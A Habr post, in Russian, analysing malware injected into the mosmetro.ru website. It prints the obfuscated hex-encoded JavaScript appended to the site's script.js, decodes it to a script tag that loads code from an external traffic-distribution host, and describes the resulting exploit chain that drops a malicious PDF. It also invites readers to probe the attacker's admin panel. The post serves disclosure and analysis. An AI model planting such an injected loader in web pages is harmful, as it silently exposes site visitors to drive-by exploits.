Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку Javascript кода:
Код:
<script language="javascript" src="/script.js"></script>
Смотрим последнюю строку злополучного файла:
Код:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);
После выполнения данного участка на странице происходит добавление ещё одного сценария, но уже по внешней ссылке:
Код:
<script src="http://thetraf.net/tds/in.cgi?default"></script>
Которая после нескольких редиректов подбрасывает браузеру подходящий JS код эксплойта, использующий ту или иную актуальную уязвимость. Под Opera for Windows, например, самопроизвольно открывается вредоносный PDF файл, хотя интеграция PDF вьювера от Adobe Reader с браузером отключена.
Для желающих покопаться в коде, вот
образец JS кода и
образец PDF документа. Антивирус Касперского полученный PDF детектирует как Exploit.Win32.Pidief.cyk. Остальные антивирусные продукты почти поголовно молчат — отчет VirusTotal: http://ow.ly/X63u.
По данным DomainTools и WebHosting.info к данному хосту (размещённому, естественно в Китае) привязано ещё несколько доменов, предположительно для аналогичных целей.
P.S. Кстати, по адресу thetraf.net/tds/admin/ находится запароленный вход в админку Sutra TDS (TDS — traffic distribution system — система распределения траффика), если кто сможет дёрнуть оттуда какие-нибудь подробности.
© Habr.